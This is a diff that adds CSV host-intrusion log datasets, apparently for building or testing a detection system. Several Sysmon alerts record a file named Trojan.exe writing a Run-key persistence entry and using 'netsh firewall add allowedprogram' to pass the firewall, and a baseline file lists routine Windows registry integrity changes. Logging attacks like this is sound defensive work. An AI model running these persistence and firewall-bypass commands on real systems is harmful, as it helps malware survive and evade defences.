HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.673922300Z"",""eventRecordID"":""1038"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:14.664\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:14.664"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:26.803",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:13.648 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:13.654650100Z"",""eventRecordID"":""1037"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:13.648\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:13.648"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:25.837",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:12.633 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:12.637821800Z"",""eventRecordID"":""1036"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:12.633\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:12.633"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:23.380",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:10.383 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:10.401572500Z"",""eventRecordID"":""1034"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:10.383\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:10.383"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:23.366",10,"ATT&CK T1090: Netsh","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:10.384 +ProcessGuid: {df9fc3d3-d1c6-5ec7-0000-00109dbf2600} +ProcessId: 1976 +Image: C:\Windows\SysWOW64\netsh.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Network Command Shell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netsh.exe +CommandLine: netsh firewall add allowedprogram ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ""Trojan.exe"" ENABLE +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7 +ParentProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ParentProcessId: 7072 +ParentImage: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +ParentCommandLine: ""C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe"" ""","netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:10.401320600Z"",""eventRecordID"":""1033"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:10.384\r\nProcessGuid: {df9fc3d3-d1c6-5ec7-0000-00109dbf2600}\r\nProcessId: 1976\r\nImage: C:\\Windows\\SysWOW64\\netsh.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Network Command Shell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netsh.exe\r\nCommandLine: netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7\r\nParentProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nParentProcessId: 7072\r\nParentImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nParentCommandLine: \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:10.384"",""processGuid"":""{df9fc3d3-d1c6-5ec7-0000-00109dbf2600}"",""processId"":""1976"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\netsh.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Network Command Shell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netsh.exe"",""commandLine"":""netsh firewall add allowedprogram \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" \\\""Trojan.exe\\\"" ENABLE"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7"",""parentProcessGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""parentProcessId"":""7072"",""parentImage"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\""""}}}", diff --git a/data/MW_9_NIDS.csv b/data/MW_9_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_9_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/NULLTEST_HIDS_1.csv b/data/NULLTEST_HIDS_1.csv new file mode 100644 index 0000000..149cff3 --- /dev/null +++ b/data/NULLTEST_HIDS_1.csv @@ -0,0 +1,297 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 13:51:18.516",5,"Windows System error event", +"Apr 4, 2020 @ 13:51:13.876",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 13:51:13.642",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:51:12.905",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 13:51:01.485",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:49:37.551",3,"Service startup type was changed", +"Apr 4, 2020 @ 13:48:30.727",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '0dc86d77d124bb6b155bb549028af3b4' +New md5sum is : 'e6e13d44f114cbf40651f4cc8c31ee88' +Old sha1sum was: 'c722c6e745e275c7f0d1d2539e58c03fd22195fa' +New sha1sum is : 'b000a4bb6e1de3be2e0ed0a9091fdbb1e48cfa38' +" +"Apr 4, 2020 @ 13:48:30.706",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'abdaf1142070594f55c16de20de0ecca' +New md5sum is : 'a69fb129b52ee626db8a1d5a59398641' +Old sha1sum was: '7a54bab4683e307c96eebc64d5244ce6417b8b7c' +New sha1sum is : '1e15b79fa9e39915b1a950ed62876ff0507a20c6' +" +"Apr 4, 2020 @ 13:48:25.019",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:48:25.004",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:17.957",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'cf2fddc0383906c94bd746fc28f1c4d5' +New md5sum is : 'dd94b5b765da707f26d26edcc0c09939' +Old sha1sum was: '2eaa7a7dac68d00dc822e249c351150d025f34a1' +New sha1sum is : '5ad085cb1feea21b232c593c0b65d6d7868a84ca' +" +"Apr 4, 2020 @ 13:48:17.950",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'd5462f300e2f617d362b4f3bb6d4ba99' +New md5sum is : '83049ce66cb3eebccaaf947e88b50216' +Old sha1sum was: '00a49d93f252e8a492de34d56cc2b2ba1662a192' +New sha1sum is : '84a8be37dcc1db73b38ac549419cf4bff6e2fffc' +" +"Apr 4, 2020 @ 13:48:17.144",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '25d0183d5c5629974b3c23282c14f09e' +New md5sum is : 'c5c41205bdb5bf6d475b5f80037201df' +Old sha1sum was: 'aeeefb5382709b3ffe72b88e68a1fc2869bdb3b8' +New sha1sum is : 'a2e0c231538ae78712ab1a3a541fc605fc954f9b' +" +"Apr 4, 2020 @ 13:48:15.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:48:15.456",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '07296bfe9f0bfcb49184a0b811972f99' +New md5sum is : 'eb6a8bcd67bffa9b419dc7a52b2fd506' +Old sha1sum was: '79ebd2b7c3546c7dddfff35ea466cc526594382b' +New sha1sum is : '9b14e761efbe81fb7d015a2af2ad84bf1fc0cb62' +" +"Apr 4, 2020 @ 13:48:14.989",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:48:14.957",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:14.770",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'e0538a3443440110bf3825bfec5e6075' +New md5sum is : 'a7359e896dce9dc4f43f826010bc86bf' +Old sha1sum was: 'e5f255d3aa180bfe02848c7ccd3f55a84325f55b' +New sha1sum is : 'b929ab004e41c0318104eddaf81133774ae0f684' +" +"Apr 4, 2020 @ 13:48:14.566",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '6021abc3342bd637a1f3e58eadc384a5' +New md5sum is : 'a5917583990985ca4870d8761fef7e73' +Old sha1sum was: '74fbcbb06a5825a47e0950f3cb6ac1c03e265d00' +New sha1sum is : 'fdf7fc3b1602a08d1d28cb92fd747fd90ad6ca9b' +" +"Apr 4, 2020 @ 13:48:14.144",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:48:14.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:13.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:48:11.472",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '1ff9d2bcd158e032084b85e368bbbc93' +New md5sum is : 'c4a30b975b2c0786f6f63a3650f75cdc' +Old sha1sum was: '654be9998073db5fb7eb1b02ce093e6875191b0a' +New sha1sum is : 'f72f7e82670f1f5b204bdea42f03eaf88a1be25a' +" +"Apr 4, 2020 @ 13:48:04.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '59c3dc20f6ca7bf5d3e4497b0fbb523a' +New md5sum is : 'd40daa86f02d44c2784d12f3fcc3ba70' +Old sha1sum was: '21fd5eb9f4366c737be868e4d053798ae111f329' +New sha1sum is : 'e7f83fee3e29992230a88e8c874f2286d848ca41' +" +"Apr 4, 2020 @ 13:48:03.895",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'd4e36f3a15fd44265b8465f9557ea88d' +New md5sum is : '3b8f384faddd1b2b278532e07f4eba7c' +Old sha1sum was: '452ac62117c54d53212a78a079263bb0875839f1' +New sha1sum is : '4fc48b1760cc5d5d048ac83bfe6b5f988ee917b5' +" +"Apr 4, 2020 @ 13:48:03.832",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'b53bf2f3f61682c350be645945192116' +New md5sum is : 'd986956d161956f4b141437fa08b93c0' +Old sha1sum was: 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +New sha1sum is : '5233ab213dffc9768aad8b2621a3d7286c52d461' +" +"Apr 4, 2020 @ 13:48:03.191",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 13:47:57.178",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:57.158",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:56.582",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:56.566",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:54.801",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:54.786",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:52.426",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:51.051",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '1e6e38e0129cb1178036ce2d2de63896' +New md5sum is : '56e9f0a7add3da7f007b812f71fed075' +Old sha1sum was: 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +New sha1sum is : 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +" +"Apr 4, 2020 @ 13:47:50.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '9899f0d851a544118a1df10180c84633' +New md5sum is : '02ce0e33acbb815a7da890475fdcdf10' +Old sha1sum was: '495d124fb9a33489fca070669c53f629787f537f' +New sha1sum is : '67728c73dace4ee9f2461f6f5d1cda14f5a9b9d2' +" +"Apr 4, 2020 @ 13:47:49.583",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '59b12546060e1abacf07181ecdab1088' +New md5sum is : '6f1747e10ba929b2c471cd607bd70111' +Old sha1sum was: 'd4b00ea9b57b4fa8d52f007174e8a4fa9c806927' +New sha1sum is : 'd81ed24b00b17432aecc17d9fa68b788a2264d11' +" +"Apr 4, 2020 @ 13:47:49.388",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d' was added. +" +"Apr 4, 2020 @ 13:47:49.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 13:47:49.347",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:47:41.941",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'ae2d280bcb1d70c8d8c9440f99e7346f' +New md5sum is : '476d7df2b152a9b2d97a5f0924d0244d' +Old sha1sum was: '5e5d8fc3198d01bfeb0b40c7b5b2377aa397ca0b' +New sha1sum is : 'c17a17f15fbb04638a03ca4ea386c67f34deac53' +" +"Apr 4, 2020 @ 13:47:40.566",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:38.004",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'e539e5588ade4fc950140b672a9b4a8e' +New md5sum is : 'c275c91ca37799a2aa9ac60794b8f614' +Old sha1sum was: '5aff67900ed86033e13fa95ee5d8cddc4bf716f6' +New sha1sum is : '27e1f817f3fc20b0a749b234646a654859adc1ac' +" +"Apr 4, 2020 @ 13:47:37.395",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'a34f50b409ff791b8ca73db3b1ca0733' +New md5sum is : '2beea24891ee67800c0545caeb2000c6' +Old sha1sum was: 'ef5248efe24d4437def466d2cef3295c26f57ead' +New sha1sum is : '0de58e5e9b71059260e9c9fb37cd996f349c7bd0' +" +"Apr 4, 2020 @ 13:47:34.036",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:47:28.770",7,"Integrity checksum changed.","File 